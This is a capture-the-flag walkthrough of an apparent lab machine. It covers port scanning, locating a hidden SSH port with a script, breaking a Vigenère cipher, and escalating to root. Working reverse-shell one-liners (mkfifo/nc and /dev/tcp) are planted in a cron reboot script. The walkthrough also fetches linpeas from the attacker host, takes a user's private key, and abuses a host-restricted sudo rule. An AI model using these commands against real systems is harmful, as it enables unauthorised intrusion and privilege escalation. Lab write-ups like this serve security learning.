Don't get bored and never give up. Save the values you will reuse (target IP, hostnames, ports) as shell variables; it speeds up everything that follows, so make it a habit. For wordlists, start with what is already installed under /usr/share/wordlists.
Start with a plain ping to the target and check that an ICMP echo reply comes back.
The machine answers. Add the target to /etc/hosts so a name can be used instead of the IP; /etc/hosts is consulted before DNS, so this works as a local override.
Now we are ready for our operations.
Switch to Nmap and discover the open doors of the enemy: nmap -sV -sC -oN result_general.txt -T4 -A $target_ip
-sV: version detection for the services behind the open ports.
-sC: run the default NSE scripts (same as --script=default).
-oN result_general.txt: write the results in normal format to result_general.txt.
-T4: timing template 4 (aggressive), a faster scan.
-A: OS detection, version detection, script scanning and traceroute in one flag. It already implies -sV and -sC, so those two are redundant here; harmless, but you can drop them.
This gives a general report and takes a while. Interesting services often hide on non-standard ports, and the default scan only covers the 1000 most common ones, so in real engagements scan all 65535 TCP ports patiently: nmap -p- $target_ip -A -oN all_port.txt
You need to wait patiently for the answers.
A lot of open ports, and every one of them answers as SSH. The next job is to find out why.
Now save just the port numbers (with -F/ the field before the first slash of each "open" line is the port), as a comma-separated list: awk -F/ '/open/ {b=b","$1} END {print substr(b,2)}' result_general.txt > only_ports.txt
Try to connect manually and understand the logic.
The connection is closed immediately, but before that the server prints a hint: "Lower" or "Higher".
Trying all these ports by hand takes a long time; a small .sh script does it for us.
#!/bin/bash
# Step search for the odd SSH port using the Lower/Higher hints.
# The step shrinks from 100 to 10 to 1 as soon as hints have come from both sides.
PORT=12000 # starting port, change as needed
lower=0 # set once a Lower hint was seen at step 100
higher=0 # set once a Higher hint was seen at step 100
lowerdigit=0 # same, at step 10
higherdigit=0
printf 'IP: '
read -r IP
echo "RUNNING... WAIT!"
sleep 2
while :
do
    # StrictHostKeyChecking=no -> accept the host key without asking; LogLevel=QUIET -> hide ssh's own messages
    # stdin from /dev/null so the session ends by itself instead of waiting for keyboard input
    reply=$(ssh -o StrictHostKeyChecking=no -o LogLevel=QUIET -tt "$IP" -p "$PORT" </dev/null 2>&1)
    if echo "$reply" | grep -q "Lower"; then
        if [ "$higherdigit" -eq 1 ] && [ "$lowerdigit" -eq 1 ]; then
            PORT=$((PORT+1))
        elif [ "$higher" -eq 1 ] && [ "$lower" -eq 1 ]; then
            PORT=$((PORT+10))
            lowerdigit=1
        else
            PORT=$((PORT+100))
            lower=1
        fi
        echo "Message:: Lower :: --- PORT ?> $PORT"
    elif echo "$reply" | grep -q "Higher"; then
        if [ "$higherdigit" -eq 1 ] && [ "$lowerdigit" -eq 1 ]; then
            PORT=$((PORT-1))
        elif [ "$higher" -eq 1 ] && [ "$lower" -eq 1 ]; then
            PORT=$((PORT-10))
            higherdigit=1
        else
            PORT=$((PORT-100))
            higher=1
        fi
        echo "Message:: Higher :: --- PORT ?> $PORT"
    else
        # Neither hint: this is the port that behaves differently. Show what it said and stop.
        echo "No Lower/Higher hint on port $PORT:"
        echo "$reply"
        break
    fi
done
Save this locally.
Make the file executable (chmod +x port_ssh_scan.sh), then run it.
The script walks towards the target with the hints and stops on the first port that answers with neither "Lower" nor "Higher": that is the unexpected message we are after.
Let it run until it stops.
If you don't want the script, a one-liner over a port range works too: for i in $(seq 9800 9900); do echo "connecting to port $i"; ssh -o 'LogLevel=ERROR' -o 'StrictHostKeyChecking=no' -p $i test@10.10.125.65; done | grep -vE 'Lower|Higher'
The grep hides the hint lines, so only the odd port's output is shown. This works because these services close the connection by themselves; against a normal sshd the loop would sit at a password prompt, so add -o BatchMode=yes in that case.
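The step search above needs tens of connections; since every port tells you which direction to go, a binary search over the whole range needs at most 16. This is an added example, not the write-up's script, and the direction follows the write-up's convention (a "Lower" reply means the hidden port is above the one probed). TARGET and FAKE_SECRET are names assumed here; probe_fake is a simulated service so the block runs offline.

```shell
#!/bin/sh
# Added example: binary search for the odd SSH port using the Lower/Higher hints.
# Direction follows the write-up's script: "Lower" -> the hidden port is above the
# probed one, "Higher" -> below. If a target means the words literally, swap the branches.

# Real probe: one SSH connection, the hint text on stdout. TARGET is assumed to be
# set by the caller (e.g. TARGET=10.10.125.65).
probe_ssh() {
    ssh -o StrictHostKeyChecking=no -o LogLevel=QUIET -o ConnectTimeout=5 \
        -tt "$TARGET" -p "$1" </dev/null 2>&1 | tr -d '\r'
}

# Simulated service for running this offline; FAKE_SECRET stands in for the hidden port.
FAKE_SECRET=${FAKE_SECRET:-10462}
probe_fake() {
    if [ "$1" -lt "$FAKE_SECRET" ]; then echo "Lower"
    elif [ "$1" -gt "$FAKE_SECRET" ]; then echo "Higher"
    else echo "Twas brillig, and the slithy toves..."   # anything without a hint
    fi
}

PROBES=0   # number of connections made by the last bisect_port call
bisect_port() {
    # $1 = probe function, $2 = lowest port, $3 = highest port; prints the port found
    probe=$1; lo=$2; hi=$3; PROBES=0
    while [ "$lo" -le "$hi" ]; do
        mid=$(( (lo + hi) / 2 ))
        PROBES=$((PROBES + 1))
        reply=$("$probe" "$mid")
        case "$reply" in
            *Lower*)  lo=$((mid + 1)) ;;          # hidden port is above mid
            *Higher*) hi=$((mid - 1)) ;;          # hidden port is below mid
            *)        echo "$mid"; return 0 ;;    # neither hint: this is the odd port
        esac
    done
    return 1   # range exhausted without finding a hint-less port
}

# Offline demo. Against a real target: TARGET=10.10.125.65 bisect_port probe_ssh 9000 13999
bisect_port probe_fake 1024 65535
```

Only bisect inside a contiguous block of open ports (the earlier nmap -p- output tells you the block): a closed port also answers without a hint, and the search would stop there.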
The program stopped at port number 10462.
We must check.
A text full of meaningless sentences: this is a cipher. Caesar is usually the first guess, but a Caesar cipher shifts every letter by the same amount; if a Caesar solver gives nothing readable, the shift is changing from letter to letter, which is a Vigenère cipher and needs a keyed solver.
You can use this site to crack this and test it yourself: https://cryptii.com/pipes/caesar-cipher
We will prefer to use this: https://www.guballa.de/vigenere-solver
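To see why the Caesar tool fails and the Vigenère tool succeeds on the same text, here is an added example (not the write-up's code): Caesar is simply Vigenère with a one-letter key, so one decrypt routine covers both. The sample texts are constructed (the textbook LEMON example), not the ciphertext from the target.

```shell
#!/bin/sh
# Added example: Caesar vs Vigenere. Caesar applies one fixed shift; Vigenere cycles
# through the key letters, so a single-shift brute force never lines up.

# vigenere_decrypt TEXT KEY: shift each letter back by the matching key letter,
# keep case, pass non-letters through without consuming a key position.
# The key is assumed to be alphabetic.
vigenere_decrypt() {
    printf '%s\n' "$1" | awk -v key="$(printf '%s' "$2" | tr 'a-z' 'A-Z')" '
    BEGIN { A = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; kl = length(key) }
    {
        if (kl == 0) { print; next }            # empty key: nothing to undo
        out = ""; k = 0
        for (i = 1; i <= length($0); i++) {
            c = substr($0, i, 1); u = toupper(c); p = index(A, u)
            if (p == 0) { out = out c; continue }
            s = index(A, substr(key, (k % kl) + 1, 1)) - 1   # shift for this position
            k++
            r = substr(A, ((p - 1 - s + 26) % 26) + 1, 1)
            out = out (c == u ? r : tolower(r))
        }
        print out
    }'
}

# caesar_bruteforce TEXT: all 26 single-letter keys, one candidate per line ("K text").
caesar_bruteforce() {
    for k in A B C D E F G H I J K L M N O P Q R S T U V W X Y Z; do
        printf '%s %s\n' "$k" "$(vigenere_decrypt "$1" "$k")"
    done
}

# Demo: no single shift turns the Vigenere text into English, the keyed decrypt does.
caesar_bruteforce "LXFOPVEFRNHR"
vigenere_decrypt "LXFOPVEFRNHR" "LEMON"   # ATTACKATDAWN
```

The online solver does the extra work of guessing the key length and the key from letter frequencies; once you have the key, the routine above is all that decryption is.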
We managed to break it. And we have the secret. Now we can move on to the next step.
Now we have the login information for a user.
Try connecting to this user via the regular ssh port.
We are successful.
You should examine everything you can find.
Let's look at what this user is authorised to run.
Whenever a reboot shows up in what you are allowed to run, think of cron: @reboot entries in /etc/crontab (and /etc/cron.d) run a command every time the machine boots, which is exactly a timed execution we can trigger ourselves.
We were right: our .sh file is listed there.
Did you think of it too? Time to manipulate "twasBrillig.sh"!
You can use one of the following two approaches:
1)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.37.34 21222 >/tmp/f
2)
sh -i >& /dev/tcp/10.10.37.34/21222 0>&1 (bash only: /dev/tcp and >& are bash features, so this form needs the script to run under bash, not /bin/sh)
Overwrite the script's contents with the first approach.
Put your machine in listening mode: nc -nlvp 21222
Now trigger it: run /sbin/reboot (through sudo if that is what the rule you found allows). When the machine comes back, cron runs the modified script as the user named in the crontab entry and the shell connects back to the listener.
We got that! Now, discover it.
It looks like hex, so decode it.
Use this: https://www.boxentriq.com/code-breaking/hex-analysis (offline, piping the string through xxd -r -p does the same).
We obtained another password! Good news.
Let’s look at potential users.
Now that we have found which user this password belongs to, log in as that user over SSH again, here "jabberwock".
We need some permissions.
Look inside the .ssh folder of every home directory you can read; a private key named id_rsa is the usual find.
Save it locally and restrict its permissions (chmod 600 id_rsa), otherwise ssh refuses to use it.
Let's connect with Alice's RSA key: ssh -i id_rsa alice@$target_ip
We’ve been pretty successful so far.
Let's complete our process by getting "linpeas.sh" onto the system. Save it locally.
Serve it with Python's built-in HTTP server: python3 -m http.server 8000
Then fetch it on the target machine, e.g. wget http://10.10.37.34:8000/linpeas.sh, and make it executable.
We are ready to go.
It appears that there is a "sudo" rule for the alice user in the /etc/sudoers.d/alice file.
As you can see above, alice may run /bin/bash as root, but the rule names a specific host, ssalg-gnikool ("looking-glass" backwards), instead of ALL, so a plain sudo on this machine does not match it.
sudo's -h flag supplies the host name used when matching rules, so the rule written for ssalg-gnikool applies: sudo -h ssalg-gnikool /bin/bash
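To spot this kind of rule without reading sudoers by eye, here is an added example (not the write-up's code): a small parser for sudoers user specifications that lists rules whose host field is neither ALL nor the current hostname, which are exactly the ones a "sudo -h <host>" may unlock. The sudoers text in the demo is constructed; the write-up describes the real rule but does not quote it.

```shell
#!/bin/sh
# Added example: find host-restricted sudoers rules.

# parse_sudoers FILE: one "user|host|runas|command" line per user specification.
# Defaults, alias definitions, comments and blank lines are skipped. "runas" is empty
# when the rule has no (user) part, which sudo treats as root.
parse_sudoers() {
    grep -Ev '^[[:space:]]*(#|$|Defaults|Cmnd_Alias|User_Alias|Host_Alias|Runas_Alias)' "$1" |
    sed -E 's/^([^[:space:]]+)[[:space:]]+([^[:space:]=]+)[[:space:]]*=[[:space:]]*(\(([^)]*)\)[[:space:]]*)?(.*)$/\1|\2|\4|\5/'
}

# host_restricted_rules FILE: rules that only apply on some other host.
host_restricted_rules() {
    parse_sudoers "$1" | awk -F'|' -v me="$(uname -n)" '
        $2 != "ALL" && $2 != me {
            runas = ($3 == "" ? "root" : $3)
            printf "%s may run %s as %s only on host %s: try  sudo -h %s <command>\n", $1, $4, runas, $2, $2
        }'
}

# Constructed sample in /etc/sudoers.d style; prints the temp file path.
sudoers_sample_file() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# constructed example, not the target's file
Defaults env_reset
alice ssalg-gnikool = (root) NOPASSWD: /bin/bash
bob ALL=(ALL:ALL) ALL
carol ALL=/usr/bin/less
EOF
    printf '%s\n' "$f"
}

f=$(sudoers_sample_file)
parse_sudoers "$f"
host_restricted_rules "$f"
rm -f "$f"
```

On the target, point it at /etc/sudoers and the files in /etc/sudoers.d you can read; the parser handles the common one-line user specs, not line continuations or multiple comma-separated commands.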
You will be root!